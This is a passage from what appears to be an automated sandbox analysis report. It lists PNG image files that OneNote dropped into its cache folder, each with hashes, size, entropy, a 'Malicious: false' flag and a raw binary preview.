SHA-512:	2AF4A9B87FA4F362926CD77F272CECBE3ED4F0E110FB8F30F661DF7C61B77B9FD8E7716EEF9177B1038B68C792CA4F844F729DAA48B2E38B9945EC9CB44BB720
Malicious:	false
Preview:	.PNG........IHDR.......D.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.yp.....E-.......-v...VY.a.d....R.euF.).KH@.B..u@YdQ....!&.tjg.!.,a'.L..@H...{'\~yy.....w2z...s.=..;..s.......]..j..b5d.j.X...2D......r.\.#..f...Bl.....5dC....r...............:m.....s..j.f..jK....y.^....'8.....<......g.....=.%..2.p..}<.....G.....Ix.m.4dm..B.......0?..+_...c..n.......?....wa..l...p....E.Ly.}......C.D.vy).....@.>\...3;.`].q..m../.d.B.../......~.p.U..'...sP\....YH.7.../....R!...O...'.....s....<\|.f)....i.{.I..l.a.n...?~.{...h...s.e..-..Q..R..@<;.y.G.+n.....Y.Y'.V.}.o._..?...,.>}..\w....`+.}.{.p"d.RO=&.v..H].....k...X.c..z.{........}.n....s:c...i7N...\|....\..O.....)w..[>..E..}y....q..u.!.z.D.[`Uf.Y...>z\..x.B.h" \.}...`...\|._.....G...hY.../..6>..Z...8^..k.E.5d#..a."....P.CR....OL..U...qY.{.C.<~I=V..x.J..k.Y....z.;?..^...3.4\|i...[DL,..z].._..a.....(s./...W~..q*.\#@[R.N...@.."..=....\q...<.......p...+J..\#...(.,....OQ...$L...G...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003E.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2270
Entropy (8bit):	7.845368393313232
Encrypted:	false
SSDEEP:	48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
MD5:	6EFE6733E10E011FFDD6711B5F37C9E2
SHA1:	C72549E824EAD899944A38C46FBC28BDCDAAD611
SHA-256:	92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
SHA-512:	EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
Malicious:	false
Preview:	.PNG........IHDR.......2............sRGB.........gAMA......a.....pHYs..........o.d...sIDATx^.\kL.W....F......@..(H4."iI}..B!.iD...I-....y.I.h.....<..1.....C..(XSy.l....,-,.......3..3...;.{...{.{g.....Q..x.T/q...F.V...B..'..?{:.:...`.........+.0s.e...w....{.`. ....5...d..9S]../............$Y.>.I....i..8....;,r8r!Ee'"..!.&E.....n...=.@..Sp.GF..c....1QH3....?,.T.el......t?..([Q`.0....k.G.....X..C...k\|p...I.q;.d..N....c.u.a.5.%.k.fS\)..H..T.~lk.[.n...x2.1...........%...yK..a..l.[.?#..fD%.FMT. =r.jt^..fT...c.&..Lr..............\..V.ll....Br^6..U27...O..N..K.gm.K..g.;..l..Fe...w?..Q.E......0.........7...(.e..t...x.c6..Q..n.92:%....l..4.h]Z.....w..\|..!.p.~..B.y..&.......gl...\.wI......G.6.K.$...%.-.h]\8.LT.....}{a...^.i......4.0.ji...........n.pk ......7t....U9..b...I.....#...<q..(\|=F.......0@^......+..........X. .>p....S..t.].f.x.0....7d..n..'..'... .M.qqn...G.t8'.=..V.PK....K...X.z.#..I.....@...Y....BH..I.....,..K....=`&Z.41$..a'o.:....i{o

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003F.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	8184
Entropy (8bit):	7.807848176906598
Encrypted:	false
SSDEEP:	192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
MD5:	5B386BF9A20766956A84F67F913F23D7
SHA1:	6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
SHA-256:	DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
SHA-512:	99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
Malicious:	false
Preview:	.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..\|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.\|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003G.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	2599
Entropy (8bit):	7.903700862190034
Encrypted:	false
SSDEEP:	48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
MD5:	E88131C9AAC52649FF044905ACAB9B76
SHA1:	34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
SHA-256:	30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
SHA-512:	97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
Malicious:	false
Preview:	.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B\|E..>.....Q........b[.K........m.(..... ...!%1%-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.\|...Yszl.N.:......KPs.):).T.5...&B.....5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.\|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......\|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.\|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003H.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	22634
Entropy (8bit):	7.974332204835705
Encrypted:	false
SSDEEP:	384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
MD5:	548D234C9AB4021CA5FAB7BF22502465
SHA1:	2F7495D250DC86EA99473CC342D164B859926021
SHA-256:	7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
SHA-512:	261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
Malicious:	false
Preview:	.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O\|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../\|.O........7_...Oj....\|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[\|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.\|..kv....];j\|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9\|.m.+`).\|......x..vak-].../.....G'....4.>B6$.......-o.q..L;.N+....>...=.!.Y..Q...?......7..,....}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003I.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1570
Entropy (8bit):	7.780157858994452
Encrypted:	false
SSDEEP:	48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
MD5:	EF9AA5B2ADBE5DF68AC4F4D716DF7708
SHA1:	363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
SHA-256:	3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
SHA-512:	EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
Malicious:	false
Preview:	.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.>.E,;.....~..\|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&............Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~\|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er\|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.\|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D\|3t.-\g...Q

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003J.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	11449
Entropy (8bit):	7.91552812501629
Encrypted:	false
SSDEEP:	192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
MD5:	163E6791C87E4999C343EC5E23843B15
SHA1:	43CE3BAE19E22876483A7FD0E93DB45790373600
SHA-256:	DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
SHA-512:	98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
Malicious:	false
Preview:	.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....\|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E\|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.\|..\|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003K.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	4081
Entropy (8bit):	7.943373267196131
Encrypted:	false
SSDEEP:	96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
MD5:	29B87BEEC5D3899824AA390530CD47FB
SHA1:	55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
SHA-256:	F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
SHA-512:	1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
Malicious:	false
Preview:	.PNG........IHDR.......Y.....2.h.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].LTW.f..O.a............k...M.Z.n.q.h....ht.f.M.n.6..t.h.k.h5.6][[....X..p...?..g.`..7.o..of....^.ys..{.{...s.UMMM.(.l.@.l..R?.......(0+0.......5....F..#.].........1.....B[>[..a..L.....x...0.5t.v..S.h!.........Y....B..&.......f#.w5u...............0...x.sC....a.4j5V..Z..n....K..>...3t..wm..3hB.BD.P..FkcJ6.....O........7...S.........6..P.]mf.+o....w..<.......Y..Z.whd.....zf+.....#."_?....`.._... qf+.?.?"k...zgME..j..!.k.U.....&z..N....ma.......R.{.r0.S..KP..fU....g~..=..Q.n.. 8T=/'9,.KDW...GN;0(P3_....1......'.;..;\|.L.a.&<\.d......o...Y... {E.F..}.e.\..=W..#..W....c./~..b.EWXI.#.''&.........:....X...b.....+2...5..6+)we~ja:lZ.d.Ey....l.2.5r........!.!._\|.A.....j2.5.o.....WOM....V......GC9..'.... ....C..,._...cS....b.1.....t.........._........a.3..K..>V.f]...~....K...-........#.o.Y.P........a.7..,#..'s...T.....b..]..3..dPPP..Y.i...c.b

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003Q.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3679
Entropy (8bit):	7.931319059366604
Encrypted:	false
SSDEEP:	96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
MD5:	995CEACAD563F849C4142B6A6F29F081
SHA1:	44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
SHA-256:	3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
SHA-512:	3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^....W...Gh...k.Hm..J.m....,X...Eh..%.n.....PHvy$%...[...R..l...(/..-..yl..Z.h..H!.../.\|.y\|w...7d3s.s.=.{.s.g.6W.^..)..@..{..'O.LL.......c.^.6xS&O.,...J.(\|?...............,.$......@.zk....,.$.........)..7]O...mH7..0..\|..&j..t..F...T...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H...AZ7z.....$H....W.6.....0...FTcc.Wi....Q)...<......{...#G....Y.f....KKK..,,,4.....{S.`...+O.[..+.\H...(.<..Qy..ET.PM...c....~(.g..*...ol.K......Sc8..q.F.KM"<...:t.O.>b..$t..].........2..y.h."!f.08hT..m.(..C.7n.......@....SVUU).F.).X\\....[j.U....$x$d..e...<.W......=;0L78t+..Gw..-....]......C7......K.w..._..g......A.&M.$^.#.!....e.\.P........;vD..@...Za.@D..f...! .2w...4#.J..c....K}....F.u.I.b.V2.k...5..`............M..!.,.;.E..BZ....K..[7....5....,...........K...7+.6..o....\,`...z..5x...\46x.b......Y....s.^.x=.e.4s.W..t,.iu.G^.....(74....`.....:......]..&..j+t9..3..}..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003R.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	1657
Entropy (8bit):	7.80882577056055
Encrypted:	false
SSDEEP:	24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
MD5:	D5F7A65469623327F799B516ACBFFD2F
SHA1:	76C6333C14AF3A7EA091819953E6E12DC289A12C
SHA-256:	F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
SHA-512:	351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
Malicious:	false
Preview:	.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..\|'.n.x...c....._O...[)......S..Q...d......A....4..t....E..v..}..7...t.b....,/\|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003S.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	14458
Entropy (8bit):	7.944094738048628
Encrypted:	false
SSDEEP:	384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
MD5:	7CEB71F78A193F8C9F7FFDA5F81AEBD8
SHA1:	EEC1597705EFF1A527C246B86A71878185BA6B1B
SHA-256:	77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
SHA-512:	1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
Malicious:	false
Preview:	.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...dU...C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003T.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13030
Entropy (8bit):	7.948664903731204
Encrypted:	false
SSDEEP:	384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
MD5:	17E9FF9F735102231846936F0E2BAF1A
SHA1:	9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
SHA-256:	DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
SHA-512:	71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
Malicious:	false
Preview:	.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .....z..\|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..pM......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003U.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	3879
Entropy (8bit):	7.9281351307465044
Encrypted:	false
SSDEEP:	96:k1hccap27HGVhY2Kn+A3RS+HG3dXrjmg26vh:k1hccewIhYxRmR5
MD5:	C451B2A146BDD7EF33AB3EA27268796D
SHA1:	C040BA2F31342CBCBF597C96D4D6EDB83D473B77
SHA-256:	4C264B2A6E88712234DAA8E3A8D630CBF4EEB338554CB0B794D8031F8943EE65
SHA-512:	55915A304B261BC6F38F5CFE0389D5195F85FE2C1DA325019C3AA391E8B1773091E078A35BD57F8CEE0BA035956382AE33790EF462053FCE711EEA9665B7F917
Malicious:	false
Preview:	.PNG........IHDR.............c.L.....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.].p.U..g..Bp!...\.!.`pA.+....H.U..."Z..U.. ..P.D.-.$..,,..$.g.......CB.l......I.g.pc..Lf..~.=.~]S.....w.9..w..'...!L..A ..^.t...v..s4&&&%%..6..`..:.G.D@.7.qS...K....[..,...o...p..2.%..B.Y....\|;..gy+.[..,...o...p..2.%..B.Y....\|;..gy+.[..,...og...}.W..z\?...y..;_t....=..e\.....6.M\|[...B._....[_.\^Pf.....f.....\l..../6....<S.4./..m.......l....B'.n...O...yc...........X...P...k....t..9tf.g>....e..Sy'.L+*.]{..a...,7...p..+......K..y.9p...I{..i58....v..5.`Op.....{.......8.._.S.........p..).........;.....y...2...b.[>gP....C..G.H...........Osp...)..9x!...W.,..^....$r.p.sOJ.l..=.x.9s&:..........h.`..W"V..\|.l{..72.....zv@.#.<.........../....F\|...c...4.W....:uj@1...~.X............^si....Z..I~.Q.<.....NAOq...+i`.)...$L..gV.6#.....F$..hD.g.L-\..H._.u..]4......h...T.BK\\.Z222....7))..h...1??...~.-i=...X...~h....y[.............p.....x....c...{....Uh.7n.....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000003V.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	13084
Entropy (8bit):	7.940058639272698
Encrypted:	false
SSDEEP:	384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
MD5:	0693DABBBC411538D209F32E22F622F6
SHA1:	FB7E675406FA123CDB7E058D336742D6A2E8DC8E
SHA-256:	2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
SHA-512:	F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
Malicious:	false
Preview:	.PNG........IHDR.......~.............sRGB.........gAMA......a.....pHYs..........o.d..2.IDATx^.w....'m.9c.6"...&.`.N.(.TN.Ne.N.R.eKr..T.[...?T..:I.D.S>I$A...I......y.9...f......3...Gh.....}_.o....n..A@.....A@...L...2... ..... .x...#. ..... .....1f]9.[.....A@......3 ..... ...fE@x.YWN.....A@......1...... .....Y..J.Y.N.....s"................./..rc.scuyyyu...\s....t.oi..j..lv.....Gr.#9%%%9%--....d.T...r...DH...6.....%U..A@.0.....rAD ........2.5.......L.R..=W...gZ.`o..-?.T.Cy.:...y.9..y.EE...v......1..R.....1.".... `"...ss.......i.!.hY...Fj....%.-.Gw...HJJr8..6...#.......!(.?P.(.....8(u..........OOO..........dgg....Q..=..c.y....A`S.@.......3.CC..GFfg. .I.I.COrJFFFNNV^nn^^.z..%..(...^.b$........a..y.LMO-.,ylV+.k...T>Jg..//-+-......M=..x.....E.... `~..N.Kww.......z...%%.e.%.yy.i...P.)'.,A.5.d.0.Cc35==66>2::33..>..;..Ii.i.gv...DSd....l#...l..............................),...V..1 .F.'7....)..SSs..7..F...C.p....(*,......(RG..B...l!.2. ....\|r1

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000040.bin

Download File

Process:	C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
File Type:	PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
Category:	dropped
Size (bytes):	7374
Entropy (8bit):	7.955141875077912
Encrypted:	false
SSDEEP:	192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
MD5:	70DAF02EC717AB54452FA4C707BCAC74
SHA1:	30F46FAC5E96470848C5A948162CC12455A05154
SHA-256:	58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
SHA-512:	E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
Malicious:	false
